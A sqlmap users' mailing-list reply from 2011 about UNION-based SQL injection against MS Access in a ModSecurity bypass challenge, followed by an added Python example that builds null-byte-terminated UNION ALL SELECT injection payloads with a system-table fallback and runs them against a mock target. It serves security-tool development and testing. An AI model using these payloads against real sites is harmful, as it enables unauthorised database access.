Hi Marek,

On 5 July 2011 22:33, Stiefenhofer, Marek <m.stiefenho...@r-tec.net> wrote:
> ...
> Miroslav posted some news about an ongoing SQLi ModSecurity challenge. I was
> curious and had a quick look at it. One of the vulnerable applications has
> an MS Access DB and can be UNION-based injected.

Two of them are Access, the other two are MySQL 4 and MySQL 5.0. We will post the details about our bypass of ModSecurity soon, and the related tamper scripts will be committed to sqlmap trunk as well.

> Unfortunately UNION based tests against MS Access will always fail with
> sqlmap, because for UNION based injections the defined comment string
> (queries.xml) is not respected. Access needs %00 as comment string and even
> this is not working in many cases.

This is a known problem. Just addressed, read below.

> One quick fix would be adding special Access UNION test definitions to
> payload.xml like it has been done for MySQL.

Handling these corner cases specifically, to detect a certain technique against a dodgy database management system, is in our TODO list already. Also, MSysAccessObjects seems to be a viable option. Detection of UNION query against Access is now fixed.

> Another problem is the defined SELECT_FROM for MS Access dbms, it's
> MSysObjects. In the ModSecurity challenge this system table has no read
> permissions hence any UNION test must fail. But the system table
> MSysAccessXML has read permissions in this specific case.
>
> Does anyone know, which of the two tables is more likely to have read access
> in the wild? Does it make sense to change SELECT_FROM? Is MSysAccessXML
> present in older MS Access versions?

No users have read privileges over MSysObjects by default. I can't comment on MSysAccessXML. Anyone else?

-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable

_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
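The two Access-specific problems raised in the thread (the statement has to be cut off with a trailing null byte rather than a comment, and the mandatory FROM clause needs a system table the web user can actually read) are easy to see in code. The following is an added example written for this page; it is not sqlmap's own code, nor anything posted by Marek or Bernardo. It builds UNION ALL SELECT probes in the usual marker-string style, walks a list of candidate system tables until one is readable, and runs against a constructed mock target that mimics the challenge application (MSysAccessXML readable, MSysObjects not). The table order, the mock's behaviour and the payload shape are assumptions for illustration only.

```python
"""Added example: Access UNION probe with null-byte terminator and table fallback.
Not sqlmap code. The mock target below is constructed to imitate the behaviour
described in the thread (MSysObjects unreadable, MSysAccessXML readable)."""
import random
import re
import string

# Access accepts no "--" or "#" comment, so the rest of the original query is
# dropped with a trailing null byte (%00 on the wire). Assumption: the target's
# driver truncates the statement at the null byte, as the thread describes.
ACCESS_TERMINATOR = "%00"

# System tables that can satisfy Access's mandatory FROM clause. The order is
# an assumption (try the one known readable in the challenge first).
CANDIDATE_TABLES = ["MSysAccessXML", "MSysAccessObjects", "MSysObjects"]


def make_marker(length=8):
    """Random letters-only string whose reflection proves the UNION worked."""
    return "".join(random.choice(string.ascii_letters) for _ in range(length))


def build_union_payload(columns, position, table, marker,
                        terminator=ACCESS_TERMINATOR):
    """UNION ALL SELECT with NULL padding and the marker at one column."""
    cols = ["NULL"] * columns
    cols[position] = f"'{marker}'"
    return f"' UNION ALL SELECT {','.join(cols)} FROM {table}{terminator}"


def union_succeeded(response, marker):
    """The probe worked iff the marker string comes back in the page."""
    return marker in response


def find_working_probe(send, columns, marker=None):
    """Try every candidate table and marker position; return (payload, table)
    for the first probe whose marker is reflected, or (None, None)."""
    marker = marker or make_marker()
    for table in CANDIDATE_TABLES:
        for pos in range(columns):
            payload = build_union_payload(columns, pos, table, marker)
            if union_succeeded(send(payload), marker):
                return payload, table
    return None, None


# --- Constructed mock target standing in for the challenge application ------
READABLE_TABLES = {"MSysAccessXML"}  # assumption: only this one is readable


def mock_send(payload):
    """Reflect the marker only when the FROM table is readable and the
    statement was cleanly terminated with %00; otherwise return an error."""
    m = re.search(r"FROM (\w+)(%00)?$", payload)
    if not m or m.group(1) not in READABLE_TABLES or not m.group(2):
        return "Error: permission denied or syntax error"
    quoted = re.findall(r"'([A-Za-z]+)'", payload)
    return "item: " + quoted[0]


if __name__ == "__main__":
    payload, table = find_working_probe(mock_send, 3)
    print(table, payload)  # expected: MSysAccessXML and a %00-terminated probe
```

The fallback loop is the point: a single hard-coded SELECT_FROM table, as in the queries.xml discussed above, makes every UNION test fail on a target where that one table happens to be unreadable, while trying a short list of system tables costs only a handful of extra requests.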